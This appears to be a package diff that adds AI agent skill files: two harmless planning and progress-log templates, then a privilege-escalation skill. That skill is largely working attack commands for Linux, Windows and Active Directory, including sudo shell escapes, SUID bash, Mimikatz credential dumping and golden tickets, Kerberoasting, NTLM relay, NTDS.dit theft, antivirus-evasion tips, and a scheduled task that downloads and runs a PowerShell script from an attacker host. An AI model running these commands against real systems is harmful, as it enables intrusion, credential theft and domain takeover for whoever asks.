@namch/agent-assistant 1.0.0 → 1.0.2

package/skills/planning-with-files/templates/progress.md

@@ -0,0 +1,114 @@
+# Progress Log
+<!-- 
+  WHAT: Your session log - a chronological record of what you did, when, and what happened.
+  WHY: Answers "What have I done?" in the 5-Question Reboot Test. Helps you resume after breaks.
+  WHEN: Update after completing each phase or encountering errors. More detailed than task_plan.md.
+-->
+
+## Session: [DATE]
+<!-- 
+  WHAT: The date of this work session.
+  WHY: Helps track when work happened, useful for resuming after time gaps.
+  EXAMPLE: 2026-01-15
+-->
+
+### Phase 1: [Title]
+<!-- 
+  WHAT: Detailed log of actions taken during this phase.
+  WHY: Provides context for what was done, making it easier to resume or debug.
+  WHEN: Update as you work through the phase, or at least when you complete it.
+-->
+- **Status:** in_progress
+- **Started:** [timestamp]
+<!-- 
+  STATUS: Same as task_plan.md (pending, in_progress, complete)
+  TIMESTAMP: When you started this phase (e.g., "2026-01-15 10:00")
+-->
+- Actions taken:
+  <!-- 
+    WHAT: List of specific actions you performed.
+    EXAMPLE:
+      - Created todo.py with basic structure
+      - Implemented add functionality
+      - Fixed FileNotFoundError
+  -->
+  -
+- Files created/modified:
+  <!-- 
+    WHAT: Which files you created or changed.
+    WHY: Quick reference for what was touched. Helps with debugging and review.
+    EXAMPLE:
+      - todo.py (created)
+      - todos.json (created by app)
+      - task_plan.md (updated)
+  -->
+  -
+
+### Phase 2: [Title]
+<!-- 
+  WHAT: Same structure as Phase 1, for the next phase.
+  WHY: Keep a separate log entry for each phase to track progress clearly.
+-->
+- **Status:** pending
+- Actions taken:
+  -
+- Files created/modified:
+  -
+
+## Test Results
+<!-- 
+  WHAT: Table of tests you ran, what you expected, what actually happened.
+  WHY: Documents verification of functionality. Helps catch regressions.
+  WHEN: Update as you test features, especially during Phase 4 (Testing & Verification).
+  EXAMPLE:
+    | Add task | python todo.py add "Buy milk" | Task added | Task added successfully | ✓ |
+    | List tasks | python todo.py list | Shows all tasks | Shows all tasks | ✓ |
+-->
+| Test | Input | Expected | Actual | Status |
+|------|-------|----------|--------|--------|
+|      |       |          |        |        |
+
+## Error Log
+<!-- 
+  WHAT: Detailed log of every error encountered, with timestamps and resolution attempts.
+  WHY: More detailed than task_plan.md's error table. Helps you learn from mistakes.
+  WHEN: Add immediately when an error occurs, even if you fix it quickly.
+  EXAMPLE:
+    | 2026-01-15 10:35 | FileNotFoundError | 1 | Added file existence check |
+    | 2026-01-15 10:37 | JSONDecodeError | 2 | Added empty file handling |
+-->
+<!-- Keep ALL errors - they help avoid repetition -->
+| Timestamp | Error | Attempt | Resolution |
+|-----------|-------|---------|------------|
+|           |       | 1       |            |
+
+## 5-Question Reboot Check
+<!-- 
+  WHAT: Five questions that verify your context is solid. If you can answer these, you're on track.
+  WHY: This is the "reboot test" - if you can answer all 5, you can resume work effectively.
+  WHEN: Update periodically, especially when resuming after a break or context reset.
+  
+  THE 5 QUESTIONS:
+  1. Where am I? → Current phase in task_plan.md
+  2. Where am I going? → Remaining phases
+  3. What's the goal? → Goal statement in task_plan.md
+  4. What have I learned? → See findings.md
+  5. What have I done? → See progress.md (this file)
+-->
+<!-- If you can answer these, context is solid -->
+| Question | Answer |
+|----------|--------|
+| Where am I? | Phase X |
+| Where am I going? | Remaining phases |
+| What's the goal? | [goal statement] |
+| What have I learned? | See findings.md |
+| What have I done? | See above |
+
+---
+<!-- 
+  REMINDER: 
+  - Update after completing each phase or encountering errors
+  - Be detailed - this is your "what happened" log
+  - Include timestamps for errors to track when issues occurred
+-->
+*Update after completing each phase or encountering errors*

package/skills/planning-with-files/templates/task_plan.md

@@ -0,0 +1,132 @@
+# Task Plan: [Brief Description]
+<!-- 
+  WHAT: This is your roadmap for the entire task. Think of it as your "working memory on disk."
+  WHY: After 50+ tool calls, your original goals can get forgotten. This file keeps them fresh.
+  WHEN: Create this FIRST, before starting any work. Update after each phase completes.
+-->
+
+## Goal
+<!-- 
+  WHAT: One clear sentence describing what you're trying to achieve.
+  WHY: This is your north star. Re-reading this keeps you focused on the end state.
+  EXAMPLE: "Create a Python CLI todo app with add, list, and delete functionality."
+-->
+[One sentence describing the end state]
+
+## Current Phase
+<!-- 
+  WHAT: Which phase you're currently working on (e.g., "Phase 1", "Phase 3").
+  WHY: Quick reference for where you are in the task. Update this as you progress.
+-->
+Phase 1
+
+## Phases
+<!-- 
+  WHAT: Break your task into 3-7 logical phases. Each phase should be completable.
+  WHY: Breaking work into phases prevents overwhelm and makes progress visible.
+  WHEN: Update status after completing each phase: pending → in_progress → complete
+-->
+
+### Phase 1: Requirements & Discovery
+<!-- 
+  WHAT: Understand what needs to be done and gather initial information.
+  WHY: Starting without understanding leads to wasted effort. This phase prevents that.
+-->
+- [ ] Understand user intent
+- [ ] Identify constraints and requirements
+- [ ] Document findings in findings.md
+- **Status:** in_progress
+<!-- 
+  STATUS VALUES:
+  - pending: Not started yet
+  - in_progress: Currently working on this
+  - complete: Finished this phase
+-->
+
+### Phase 2: Planning & Structure
+<!-- 
+  WHAT: Decide how you'll approach the problem and what structure you'll use.
+  WHY: Good planning prevents rework. Document decisions so you remember why you chose them.
+-->
+- [ ] Define technical approach
+- [ ] Create project structure if needed
+- [ ] Document decisions with rationale
+- **Status:** pending
+
+### Phase 3: Implementation
+<!-- 
+  WHAT: Actually build/create/write the solution.
+  WHY: This is where the work happens. Break into smaller sub-tasks if needed.
+-->
+- [ ] Execute the plan step by step
+- [ ] Write code to files before executing
+- [ ] Test incrementally
+- **Status:** pending
+
+### Phase 4: Testing & Verification
+<!-- 
+  WHAT: Verify everything works and meets requirements.
+  WHY: Catching issues early saves time. Document test results in progress.md.
+-->
+- [ ] Verify all requirements met
+- [ ] Document test results in progress.md
+- [ ] Fix any issues found
+- **Status:** pending
+
+### Phase 5: Delivery
+<!-- 
+  WHAT: Final review and handoff to user.
+  WHY: Ensures nothing is forgotten and deliverables are complete.
+-->
+- [ ] Review all output files
+- [ ] Ensure deliverables are complete
+- [ ] Deliver to user
+- **Status:** pending
+
+## Key Questions
+<!-- 
+  WHAT: Important questions you need to answer during the task.
+  WHY: These guide your research and decision-making. Answer them as you go.
+  EXAMPLE: 
+    1. Should tasks persist between sessions? (Yes - need file storage)
+    2. What format for storing tasks? (JSON file)
+-->
+1. [Question to answer]
+2. [Question to answer]
+
+## Decisions Made
+<!-- 
+  WHAT: Technical and design decisions you've made, with the reasoning behind them.
+  WHY: You'll forget why you made choices. This table helps you remember and justify decisions.
+  WHEN: Update whenever you make a significant choice (technology, approach, structure).
+  EXAMPLE:
+    | Use JSON for storage | Simple, human-readable, built-in Python support |
+-->
+| Decision | Rationale |
+|----------|-----------|
+|          |           |
+
+## Errors Encountered
+<!-- 
+  WHAT: Every error you encounter, what attempt number it was, and how you resolved it.
+  WHY: Logging errors prevents repeating the same mistakes. This is critical for learning.
+  WHEN: Add immediately when an error occurs, even if you fix it quickly.
+  EXAMPLE:
+    | FileNotFoundError | 1 | Check if file exists, create empty list if not |
+    | JSONDecodeError | 2 | Handle empty file case explicitly |
+-->
+| Error | Attempt | Resolution |
+|-------|---------|------------|
+|       | 1       |            |
+
+## Notes
+<!-- 
+  REMINDERS:
+  - Update phase status as you progress: pending → in_progress → complete
+  - Re-read this plan before major decisions (attention manipulation)
+  - Log ALL errors - they help avoid repetition
+  - Never repeat a failed action - mutate your approach instead
+-->
+- Update phase status as you progress: pending → in_progress → complete
+- Re-read this plan before major decisions (attention manipulation)
+- Log ALL errors - they help avoid repetition

package/skills/privilege-escalation-methods/SKILL.md

@@ -0,0 +1,333 @@
+---
+name: Privilege Escalation Methods
+description: This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+
+# Privilege Escalation Methods
+
+## Purpose
+
+Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.
+
+## Inputs/Prerequisites
+
+- Initial low-privilege shell access on target system
+- Kali Linux or penetration testing distribution
+- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus
+- Understanding of Windows/Linux privilege models
+- For AD attacks: Domain user credentials and network access to DC
+
+## Outputs/Deliverables
+
+- Root or Administrator shell access
+- Extracted credentials and hashes
+- Persistent access mechanisms
+- Domain compromise (for AD environments)
+
+---
+
+## Core Techniques
+
+### Linux Privilege Escalation
+
+#### 1. Abusing Sudo Binaries
+
+Exploit misconfigured sudo permissions using GTFOBins techniques:
+
+```bash
+# Check sudo permissions
+sudo -l
+
+# Exploit common binaries
+sudo vim -c ':!/bin/bash'
+sudo find /etc/passwd -exec /bin/bash \;
+sudo awk 'BEGIN {system("/bin/bash")}'
+sudo python -c 'import pty;pty.spawn("/bin/bash")'
+sudo perl -e 'exec "/bin/bash";'
+sudo less /etc/hosts    # then type: !bash
+sudo man man            # then type: !bash
+sudo env /bin/bash
+```
+
+#### 2. Abusing Scheduled Tasks (Cron)
+
+```bash
+# Find writable cron scripts
+ls -la /etc/cron*
+cat /etc/crontab
+
+# Inject payload into writable script
+echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
+chmod +x /home/user/systemupdate.sh
+
+# Wait for execution, then:
+/bin/bash -p
+```
+
+#### 3. Abusing Capabilities
+
+```bash
+# Find binaries with capabilities
+getcap -r / 2>/dev/null
+
+# Python with cap_setuid
+/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
+
+# Perl with cap_setuid
+/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
+
+# Tar with cap_dac_read_search (read any file)
+/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
+/usr/bin/tar -xvf key.tar
+```
+
+#### 4. NFS Root Squashing
+
+```bash
+# Check for NFS shares
+showmount -e <victim_ip>
+
+# Mount and exploit no_root_squash
+mkdir /tmp/mount
+mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
+cd /tmp/mount
+cp /bin/bash .
+chmod +s bash
+```
+
+#### 5. MySQL Running as Root
+
+```bash
+# If MySQL runs as root
+mysql -u root -p
+\! chmod +s /bin/bash
+exit
+/bin/bash -p
+```
+
+---
+
+### Windows Privilege Escalation
+
+#### 1. Token Impersonation
+
+```powershell
+# Using SweetPotato (SeImpersonatePrivilege)
+execute-assembly sweetpotato.exe -p beacon.exe
+
+# Using SharpImpersonation
+SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
+```
+
+#### 2. Service Abuse
+
+```powershell
+# Using PowerUp
+. .\PowerUp.ps1
+Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
+Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
+```
+
+#### 3. Abusing SeBackupPrivilege
+
+```powershell
+import-module .\SeBackupPrivilegeUtils.dll
+import-module .\SeBackupPrivilegeCmdLets.dll
+Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit
+```
+
+#### 4. Abusing SeLoadDriverPrivilege
+
+```powershell
+# Load vulnerable Capcom driver
+.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
+.\ExploitCapcom.exe
+```
+
+#### 5. Abusing GPO
+
+```powershell
+.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
+  --Author DOMAIN\<USER> --Command "cmd.exe" `
+  --Arguments "/c net user Administrator Password!@# /domain" `
+  --GPOName "ADDITIONAL DC CONFIGURATION"
+```
+
+---
+
+### Active Directory Attacks
+
+#### 1. Kerberoasting
+
+```bash
+# Using Impacket
+GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request
+
+# Using CrackMapExec
+crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt
+```
+
+#### 2. AS-REP Roasting
+
+```powershell
+.\Rubeus.exe asreproast
+```
+
+#### 3. Golden Ticket
+
+```powershell
+# DCSync to get krbtgt hash
+mimikatz# lsadump::dcsync /user:krbtgt
+
+# Create golden ticket
+mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
+  /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500
+```
+
+#### 4. Pass-the-Ticket
+
+```powershell
+.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
+klist  # Verify ticket
+```
+
+#### 5. Golden Ticket with Scheduled Tasks
+
+```powershell
+# 1. Elevate and dump credentials
+mimikatz# token::elevate
+mimikatz# vault::cred /patch
+mimikatz# lsadump::lsa /patch
+
+# 2. Create golden ticket
+mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
+  /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi
+
+# 3. Create scheduled task
+schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
+  /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
+schtasks /run /s DOMAIN /TN "enterprise"
+```
+
+---
+
+### Credential Harvesting
+
+#### LLMNR Poisoning
+
+```bash
+# Start Responder
+responder -I eth1 -v
+
+# Create malicious shortcut (Book.url)
+[InternetShortcut]
+URL=https://facebook.com
+IconIndex=0
+IconFile=\\attacker_ip\not_found.ico
+```
+
+#### NTLM Relay
+
+```bash
+responder -I eth1 -v
+ntlmrelayx.py -tf targets.txt -smb2support
+```
+
+#### Dumping with VSS
+
+```powershell
+vssadmin create shadow /for=C:
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
+```
+
+---
+
+## Quick Reference
+
+| Technique | OS | Domain Required | Tool |
+|-----------|-----|-----------------|------|
+| Sudo Binary Abuse | Linux | No | GTFOBins |
+| Cron Job Exploit | Linux | No | Manual |
+| Capability Abuse | Linux | No | getcap |
+| NFS no_root_squash | Linux | No | mount |
+| Token Impersonation | Windows | No | SweetPotato |
+| Service Abuse | Windows | No | PowerUp |
+| Kerberoasting | Windows | Yes | Rubeus/Impacket |
+| AS-REP Roasting | Windows | Yes | Rubeus |
+| Golden Ticket | Windows | Yes | Mimikatz |
+| Pass-the-Ticket | Windows | Yes | Rubeus |
+| DCSync | Windows | Yes | Mimikatz |
+| LLMNR Poisoning | Windows | Yes | Responder |
+
+---
+
+## Constraints
+
+**Must:**
+- Have initial shell access before attempting escalation
+- Verify target OS and environment before selecting technique
+- Use appropriate tool for domain vs local escalation
+
+**Must Not:**
+- Attempt techniques on production systems without authorization
+- Leave persistence mechanisms without client approval
+- Ignore detection mechanisms (EDR, SIEM)
+
+**Should:**
+- Enumerate thoroughly before exploitation
+- Document all successful escalation paths
+- Clean up artifacts after engagement
+
+---
+
+## Examples
+
+### Example 1: Linux Sudo to Root
+
+```bash
+# Check sudo permissions
+$ sudo -l
+User www-data may run the following commands:
+    (root) NOPASSWD: /usr/bin/vim
+
+# Exploit vim
+$ sudo vim -c ':!/bin/bash'
+root@target:~# id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+### Example 2: Windows Kerberoasting
+
+```bash
+# Request service tickets
+$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
+
+# Crack with hashcat
+$ hashcat -m 13100 hashes.txt rockyou.txt
+```
+
+---
+
+## Troubleshooting
+
+| Issue | Solution |
+|-------|----------|
+| sudo -l requires password | Try other enumeration (SUID, cron, capabilities) |
+| Mimikatz blocked by AV | Use Invoke-Mimikatz or SafetyKatz |
+| Kerberoasting returns no hashes | Check for service accounts with SPNs |
+| Token impersonation fails | Verify SeImpersonatePrivilege is present |
+| NFS mount fails | Check NFS version compatibility (vers=2,3,4) |
+
+---
+
+## Additional Resources
+
+For detailed enumeration scripts, use:
+- **LinPEAS**: Linux privilege escalation enumeration
+- **WinPEAS**: Windows privilege escalation enumeration
+- **BloodHound**: Active Directory attack path mapping
+- **GTFOBins**: Unix binary exploitation reference